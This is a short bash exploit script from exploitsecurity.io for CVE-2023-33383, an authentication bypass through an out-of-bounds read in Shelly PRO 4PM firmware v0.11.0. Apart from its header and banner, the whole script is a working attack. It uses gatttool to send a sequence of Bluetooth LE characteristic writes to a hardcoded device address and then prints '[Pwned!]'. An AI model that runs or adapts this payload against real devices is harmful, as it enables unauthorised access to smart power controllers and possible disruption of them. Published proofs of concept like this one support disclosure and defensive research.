#!/bin/bash # Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass # Google Dork: NA # Date: 2nd August 2023 # Exploit Author: The Security Team [exploitsecurity.io] # Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability # Vendor Homepage: https://www.shelly.com/ # Software Link: NA # Version: Firmware v0.11.0 (REQUIRED) # Tested on: MacOS/Linux # CVE : CVE-2023-33383 IFS= failed=$false RED="\e[31m" GREEN="\e[92m" WHITE="\e[97m" ENDCOLOR="\e[0m" substring="Connection refused" banner() { clear echo -e "${GREEN}[+]*********************************************************[+]" echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |" echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |" echo -e "${GREEN}| CVE: CVE-2023-33383 |" echo -e "${GREEN}[+]*********************************************************[+]" echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}" } banner read -s -n 1 key if [ "$key" = "x" ]; then exit 0; elif [ "$key" = "" ]; then gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary) if [ -z "$gattout" ]; then echo -e "${RED}Connection timed out${ENDCOLOR}" exit 0; else sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1 echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}" sleep 1 if [ $? -eq 1 ]; then $failed=$true exit 0; fi sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1 sleep 1 if [ $? -eq 1 ]; then $failed=$true echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}" exit 0; else sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1 sleep 1 for i in {1..5} do echo -ne "${GREEN}." sleep 1 done echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}" fi fi fi